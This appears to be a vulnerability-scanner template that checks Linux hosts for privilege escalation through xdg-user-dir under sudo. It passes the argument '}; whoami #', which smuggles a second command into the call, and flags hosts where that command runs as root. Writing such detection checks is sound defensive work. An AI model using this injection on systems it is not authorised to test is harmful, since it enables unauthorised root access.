id: privesc-xdg-user-dir

info:
  name: xdg-user-dir - Privilege Escalation
  author: daffainfo
  severity: high
  description: |
    The xdg-user-dir command is used to retrieve the path of a user's special directories, such as the user's home directory, desktop directory, download directory, and others, based on the XDG Base Directory Specification.
  reference:
    - https://gtfobins.github.io/gtfobins/xdg-user-dir/
  metadata:
    verified: true
    max-request: 3
  tags: code,linux,xdg-user-dir,privesc,local

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      whoami

  - engine:
      - sh
      - bash
    source: |
      xdg-user-dir '}; whoami #'

  - engine:
      - sh
      - bash
    source: |
      sudo xdg-user-dir '}; whoami #'

    matchers-condition: and
    matchers:
      - type: word
        part: code_1_response
        words:
          - "root"
        negative: true

      - type: dsl
        dsl:
          - 'contains(code_2_response, "root")'
          - 'contains(code_3_response, "root")'
        condition: or
# digest: 490a00463044022052d790338c95d5a4f0c68b4a60843f3df6aac090487f194ecc148d85f94d76c802200a3645f26c4ddb25cd492038654121f410a284c9cbbd2f904ff4d9b104759046:922c64590222798bb761d5b6d8e72950